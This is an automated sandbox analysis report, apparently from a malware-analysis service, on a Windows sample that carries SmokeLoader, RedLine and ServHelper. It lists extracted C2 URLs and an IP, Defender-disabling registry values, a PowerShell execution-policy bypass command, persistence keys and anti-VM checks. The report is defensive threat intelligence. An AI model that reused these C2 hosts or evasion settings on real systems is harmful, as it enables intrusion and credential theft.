Analysis
-
max time kernel
151s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28-09-2021 23:35
Static task
static1
Behavioral task
behavioral1
Sample
e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
Resource
win10-en-20210920
redlineservhelpersmokeloaderxmrig777777backdoordiscoveryevasioninfostealerminerpersistencespywarestealersuricatathemidatrojan
windows10_x64
0 signatures
0 seconds
General
-
Target
e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe
-
Size
180KB
-
MD5
e5cf31523f01f3791bf0d2dbf2a232c4
-
SHA1
d992d4c7ff035d4dc730620924625d58be4bd4a6
-
SHA256
e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e
-
SHA512
83df9bc5351733b06adaa04f35bd3027c13ad995ea7bfde9c5ec60405c92bc5174718b80c54d1393917b3039efc26b09620807b5a995154902b3572ac3dda06c
Malware Config
Extracted
Family
smokeloader
Version
2020
C2
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
777777
C2
193.56.146.60:18243
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral1/memory/2512-169-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2512-170-0x000000000041C5D2-mapping.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 3 IoCs
resource yara_rule behavioral1/files/0x000400000001abcb-149.dat Nirsoft behavioral1/files/0x000400000001abcb-150.dat Nirsoft behavioral1/files/0x000400000001abcb-159.dat Nirsoft -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
pid Process 2772 FE2C.exe 4080 E5A.exe 2332 17A2.exe 2328 AdvancedRun.exe 3920 AdvancedRun.exe 2360 17A2.exe 2512 17A2.exe 2468 4952.exe 4112 6528.exe 4148 6528.tmp 4320 6528.exe 4388 disksyncer.exe 4408 6528.tmp 4920 SketchClient.exe 2892 Zenar_protected.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FE2C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Zenar_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Zenar_protected.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FE2C.exe -
Deletes itself 1 IoCs
pid Process 3040 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\netoptimize.lnk disksyncer.exe -
Loads dropped DLL 14 IoCs
pid Process 2468 4952.exe 2468 4952.exe 4444 MsiExec.exe 4444 MsiExec.exe 4936 MsiExec.exe 4936 MsiExec.exe 4936 MsiExec.exe 4936 MsiExec.exe 4936 MsiExec.exe 4936 MsiExec.exe 2468 4952.exe 4388 disksyncer.exe 4920 SketchClient.exe 4388 disksyncer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000600000001abc4-120.dat themida behavioral1/memory/2772-122-0x0000000000BA0000-0x0000000000BA1000-memory.dmp themida -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 17A2.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 17A2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\17A2.exe = "0" 17A2.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 17A2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 17A2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 17A2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 17A2.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 17A2.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 17A2.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 17A2.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run disksyncer.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zenar_protected.exe = "C:\\ProgramData\\Zenar_protected.\\Zenar_protected.exe" disksyncer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FE2C.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Zenar_protected.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\L: 4952.exe File opened (read-only) \??\P: 4952.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\E: 4952.exe File opened (read-only) \??\F: 4952.exe File opened (read-only) \??\H: 4952.exe File opened (read-only) \??\W: 4952.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: 4952.exe File opened (read-only) \??\Y: 4952.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Z: 4952.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: 4952.exe File opened (read-only) \??\R: 4952.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: 4952.exe File opened (read-only) \??\K: 4952.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: 4952.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\V: 4952.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: 4952.exe File opened (read-only) \??\Q: 4952.exe File opened (read-only) \??\X: 4952.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: 4952.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\J: 4952.exe File opened (read-only) \??\N: 4952.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: 4952.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\M: 4952.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
pid Process 2772 FE2C.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2332 17A2.exe 2892 Zenar_protected.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2176 set thread context of 2380 2176 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 70 PID 2332 set thread context of 2512 2332 17A2.exe 82 -
Drops file in Windows directory 22 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI6015.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6354.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{00CE1E75-E04C-4F83-824D-20B2297C955F} msiexec.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Installer\35bdd.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI60F0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI61EB.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\Installer\35bdd.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI5D82.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5F58.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI6902.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 2240 2332 WerFault.exe 74 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4600 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 4952.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 4952.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 4952.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2380 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 2380 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found 3040 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3040 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 632 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2380 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 2332 17A2.exe Token: SeDebugPrivilege 2328 AdvancedRun.exe Token: SeImpersonatePrivilege 2328 AdvancedRun.exe Token: SeDebugPrivilege 2772 FE2C.exe Token: SeDebugPrivilege 3920 AdvancedRun.exe Token: SeImpersonatePrivilege 3920 AdvancedRun.exe Token: SeRestorePrivilege 2240 WerFault.exe Token: SeBackupPrivilege 2240 WerFault.exe Token: SeBackupPrivilege 2240 WerFault.exe Token: SeDebugPrivilege 3840 powershell.exe Token: SeDebugPrivilege 2240 WerFault.exe Token: SeDebugPrivilege 3556 powershell.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 2512 17A2.exe Token: SeDebugPrivilege 3860 powershell.exe Token: SeSecurityPrivilege 4276 msiexec.exe Token: SeCreateTokenPrivilege 2468 4952.exe Token: SeAssignPrimaryTokenPrivilege 2468 4952.exe Token: SeLockMemoryPrivilege 2468 4952.exe Token: SeIncreaseQuotaPrivilege 2468 4952.exe Token: SeMachineAccountPrivilege 2468 4952.exe Token: SeTcbPrivilege 2468 4952.exe Token: SeSecurityPrivilege 2468 4952.exe Token: SeTakeOwnershipPrivilege 2468 4952.exe Token: SeLoadDriverPrivilege 2468 4952.exe Token: SeSystemProfilePrivilege 2468 4952.exe Token: SeSystemtimePrivilege 2468 4952.exe Token: SeProfSingleProcessPrivilege 2468 4952.exe Token: SeIncBasePriorityPrivilege 2468 4952.exe Token: SeCreatePagefilePrivilege 2468 4952.exe Token: SeCreatePermanentPrivilege 2468 4952.exe Token: SeBackupPrivilege 2468 4952.exe Token: SeRestorePrivilege 2468 4952.exe Token: SeShutdownPrivilege 2468 4952.exe Token: SeDebugPrivilege 2468 4952.exe Token: SeAuditPrivilege 2468 4952.exe Token: SeSystemEnvironmentPrivilege 2468 4952.exe Token: SeChangeNotifyPrivilege 2468 4952.exe Token: SeRemoteShutdownPrivilege 2468 4952.exe Token: SeUndockPrivilege 2468 4952.exe Token: SeSyncAgentPrivilege 2468 4952.exe Token: SeEnableDelegationPrivilege 2468 4952.exe Token: SeManageVolumePrivilege 2468 4952.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 4648 msiexec.exe 4648 msiexec.exe 4408 6528.tmp 3040 Process not Found 3040 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3040 Process not Found 3040 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2176 wrote to memory of 2380 2176 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 70 PID 2176 wrote to memory of 2380 2176 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 70 PID 2176 wrote to memory of 2380 2176 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 70 PID 2176 wrote to memory of 2380 2176 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 70 PID 2176 wrote to memory of 2380 2176 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 70 PID 2176 wrote to memory of 2380 2176 e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe 70 PID 3040 wrote to memory of 2772 3040 Process not Found 71 PID 3040 wrote to memory of 2772 3040 Process not Found 71 PID 3040 wrote to memory of 2772 3040 Process not Found 71 PID 3040 wrote to memory of 4080 3040 Process not Found 73 PID 3040 wrote to memory of 4080 3040 Process not Found 73 PID 3040 wrote to memory of 4080 3040 Process not Found 73 PID 3040 wrote to memory of 2332 3040 Process not Found 74 PID 3040 wrote to memory of 2332 3040 Process not Found 74 PID 3040 wrote to memory of 2332 3040 Process not Found 74 PID 2332 wrote to memory of 2328 2332 17A2.exe 75 PID 2332 wrote to memory of 2328 2332 17A2.exe 75 PID 2332 wrote to memory of 2328 2332 17A2.exe 75 PID 2328 wrote to memory of 3920 2328 AdvancedRun.exe 76 PID 2328 wrote to memory of 3920 2328 AdvancedRun.exe 76 PID 2328 wrote to memory of 3920 2328 AdvancedRun.exe 76 PID 2332 wrote to memory of 3840 2332 17A2.exe 79 PID 2332 wrote to memory of 3840 2332 17A2.exe 79 PID 2332 wrote to memory of 3840 2332 17A2.exe 79 PID 2332 wrote to memory of 2360 2332 17A2.exe 81 PID 2332 wrote to memory of 2360 2332 17A2.exe 81 PID 2332 wrote to memory of 2360 2332 17A2.exe 81 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 2332 wrote to memory of 2512 2332 17A2.exe 82 PID 4080 wrote to memory of 3556 4080 E5A.exe 86 PID 4080 wrote to memory of 3556 4080 E5A.exe 86 PID 4080 wrote to memory of 3556 4080 E5A.exe 86 PID 3556 wrote to memory of 3756 3556 powershell.exe 88 PID 3556 wrote to memory of 3756 3556 powershell.exe 88 PID 3556 wrote to memory of 3756 3556 powershell.exe 88 PID 3756 wrote to memory of 1560 3756 csc.exe 89 PID 3756 wrote to memory of 1560 3756 csc.exe 89 PID 3756 wrote to memory of 1560 3756 csc.exe 89 PID 3040 wrote to memory of 2468 3040 Process not Found 90 PID 3040 wrote to memory of 2468 3040 Process not Found 90 PID 3040 wrote to memory of 2468 3040 Process not Found 90 PID 3556 wrote to memory of 3860 3556 powershell.exe 91 PID 3556 wrote to memory of 3860 3556 powershell.exe 91 PID 3556 wrote to memory of 3860 3556 powershell.exe 91 PID 4276 wrote to memory of 4444 4276 msiexec.exe 94 PID 4276 wrote to memory of 4444 4276 msiexec.exe 94 PID 4276 wrote to memory of 4444 4276 msiexec.exe 94 PID 2468 wrote to memory of 4648 2468 4952.exe 95 PID 2468 wrote to memory of 4648 2468 4952.exe 95 PID 2468 wrote to memory of 4648 2468 4952.exe 95 PID 4276 wrote to memory of 4936 4276 msiexec.exe 96 PID 4276 wrote to memory of 4936 4276 msiexec.exe 96 PID 4276 wrote to memory of 4936 4276 msiexec.exe 96 PID 3040 wrote to memory of 4112 3040 Process not Found 97 PID 3040 wrote to memory of 4112 3040 Process not Found 97 PID 3040 wrote to memory of 4112 3040 Process not Found 97 PID 4112 wrote to memory of 4148 4112 6528.exe 98 PID 4112 wrote to memory of 4148 4112 6528.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe"C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe"C:\Users\Admin\AppData\Local\Temp\e312af68203fd80a2dd86a69460941ce29709424310abffd66fd7323a2b8ef6e.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\FE2C.exeC:\Users\Admin\AppData\Local\Temp\FE2C.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
C:\Users\Admin\AppData\Local\Temp\E5A.exeC:\Users\Admin\AppData\Local\Temp\E5A.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvqav023\qvqav023.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
